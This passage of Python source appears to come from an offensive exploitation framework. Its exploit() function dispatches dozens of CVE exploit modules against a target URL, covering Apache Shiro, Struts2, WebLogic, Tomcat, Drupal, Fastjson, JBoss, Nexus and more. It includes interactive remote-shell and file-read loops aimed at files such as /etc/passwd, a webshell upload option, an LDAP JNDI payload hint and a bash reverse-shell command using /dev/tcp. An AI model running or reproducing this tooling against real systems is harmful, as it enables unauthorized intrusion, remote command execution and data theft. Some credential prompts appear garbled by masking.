"CVE-2020-5902" or vul_num == "cve-2020-5902": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) exp_big_ip.cve_2020_5902_exp(cmd) elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295": print( now.timed(de=delay) + color.yel_info() + color.yellow( " java encode: http://www.jackson-t.ca/runtime-exec-payloads.html" )) exp_apache_ofbiz.cve_2021_26295_exp(cmd) else: pass
def exploit(target, vul_num): target = url_check(target) if survival_check(target) == "f": print( now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target)) exit(0) delay = globals.get_value("DELAY") # 获取全局变量DELAY exp_apache_shiro = ApacheShiro(target) exp_apache_solr = ApacheSolr(target) exp_apache_tomcat = ApacheTomcat(target) exp_elasticsearch = Elasticsearch(target) exp_apache_flink = ApacheFlink(target) exp_jenkins = Jenkins(target) exp_spring = Spring(target) exp_nexus = Nexus(target) exp_oracle_weblogic = OracleWeblogic(target) exp_redhat_jboss = RedHatJBoss(target) exp_apache_unomi = ApacheUnomi(target) exp_thinkphp = ThinkPHP(target) exp_drupal = Drupal(target) exp_fastjson = Fastjson(target) exp_apache_struts2 = ApacheStruts2(target) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target)) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num)) nc = now.timed(de=0) + color.yel_info() + color.yellow( " input \"nc\" bounce linux shell") up = now.timed(de=0) + color.yel_info() + color.yellow( " input \"upload\" upload webshell") rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow( " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)") bash = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"") cmd = "whoami" # 为了消除pycharm错误提示,没啥用 file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用 shiro_key = "1" # 为了消除pycharm错误提示,没啥用 shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用 nexus_u = "admin" # 为了消除pycharm错误提示,没啥用 nexus_p = "admin" # 为了消除pycharm错误提示 if vul_num not in explists: print( now.timed(de=0) + color.red_warn() + color.red( " The vulnerability does not support exploitation. Please refer to \"--list\"" )) sys.exit(0) elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437": if os_check() == "linux" or os_check() == "other": shiro_key = input(now.timed(de=delay) + color.green("[+] key: ")) shiro_gadget = input( now.timed(de=delay) + color.green("[+] gadget: ")) elif os_check() == "windows": shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ") shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget) elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_tomcat.cve_2020_1938_exp(file) elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2019_3799_exp(file) elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2020_5410_exp(file) elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_flink.cve_2020_17519_exp(file) elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199": if os_check() == "linux" or os_check() == "other": nexus_u = input( now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows": nexus_u = input( now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p) # 远程命令执行漏洞单独简单运行 else: while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": exit(0) elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615": exp_apache_tomcat.cve_2017_12615_exp(cmd) elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120": exp_elasticsearch.cve_2014_3120_exp(cmd) elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427": exp_elasticsearch.cve_2015_1427_exp(cmd) elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861": exp_jenkins.cve_2018_1000861_exp(cmd) elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506": exp_oracle_weblogic.cve_2017_3506_exp(cmd) elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271": print(nc) print(up) exp_oracle_weblogic.cve_2017_10271_exp(cmd) elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894": exp_oracle_weblogic.cve_2018_2894_exp(cmd) elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725": print(nc) print(up) exp_oracle_weblogic.cve_2019_2725_exp(cmd) elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729": print(nc) exp_oracle_weblogic.cve_2019_2729_exp(cmd) elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555": exp_oracle_weblogic.cve_2020_2555_exp(cmd) elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883": exp_oracle_weblogic.cve_2020_2883_exp(cmd) elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882": exp_oracle_weblogic.cve_2020_14882_exp(cmd) elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629": exp_apache_solr.cve_2017_12629_exp(cmd) elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558": exp_apache_solr.cve_2019_17558_exp(cmd) elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238": exp_nexus.cve_2019_7238_exp(cmd) elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738": exp_redhat_jboss.cve_2010_0738_exp(cmd) elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428": exp_redhat_jboss.cve_2010_1428_exp(cmd) elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501": exp_redhat_jboss.cve_2015_7501_exp(cmd) elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942": exp_apache_unomi.cve_2020_13942_exp(cmd) elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082": print(up) exp_thinkphp.cve_2019_9082_exp(cmd) elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062": exp_thinkphp.cve_2018_20062_exp(cmd) elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600": exp_drupal.cve_2018_7600_exp(cmd) elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602": exp_drupal.cve_2018_7602_exp(cmd) elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340": exp_drupal.cve_2019_6340_exp(cmd) elif vul_num == "S2-005" or vul_num == "s2-005": exp_apache_struts2.s2_005_exp(cmd) elif vul_num == "S2-008" or vul_num == "s2-008": exp_apache_struts2.s2_008_exp(cmd) elif vul_num == "S2-009" or vul_num == "s2-009": exp_apache_struts2.s2_009_exp(cmd) elif vul_num == "S2-013" or vul_num == "s2-013": exp_apache_struts2.s2_013_exp(cmd) elif vul_num == "S2-015" or vul_num == "s2-015": exp_apache_struts2.s2_015_exp(cmd) elif vul_num == "S2-016" or vul_num == "s2-016": exp_apache_struts2.s2_016_exp(cmd) elif vul_num == "S2-029" or vul_num == "s2-029": exp_apache_struts2.s2_029_exp(cmd) elif vul_num == "S2-032" or vul_num == "s2-032": exp_apache_struts2.s2_032_exp(cmd) elif vul_num == "S2-045" or vul_num == "s2-045": exp_apache_struts2.s2_045_exp(cmd) elif vul_num == "S2-046" or vul_num == "s2-046": exp_apache_struts2.s2_046_exp(cmd) elif vul_num == "S2-048" or vul_num == "s2-048": exp_apache_struts2.s2_048_exp(cmd) elif vul_num == "S2-052" or vul_num == "s2-052": exp_apache_struts2.s2_052_exp(cmd) elif vul_num == "S2-057" or vul_num == "s2-057": exp_apache_struts2.s2_057_exp(cmd) elif vul_num == "S2-059" or vul_num == "s2-059": exp_apache_struts2.s2_059_exp(cmd) elif vul_num == "S2-061" or vul_num == "s2-061": exp_apache_struts2.s2_061_exp(cmd) elif vul_num == "S2-devMode" or vul_num == "s2-devmode": exp_apache_struts2.s2_devMode_exp(cmd) elif vul_num == "1.2.24": print(rmi_ldap) exp_fastjson.fastjson_1224_exp(cmd) elif vul_num == "1.2.47": print(rmi_ldap) exp_fastjson.fastjson_1247_exp(cmd) elif vul_num == "1.2.62": print(rmi_ldap) exp_fastjson.fastjson_1262_exp(cmd) else: pass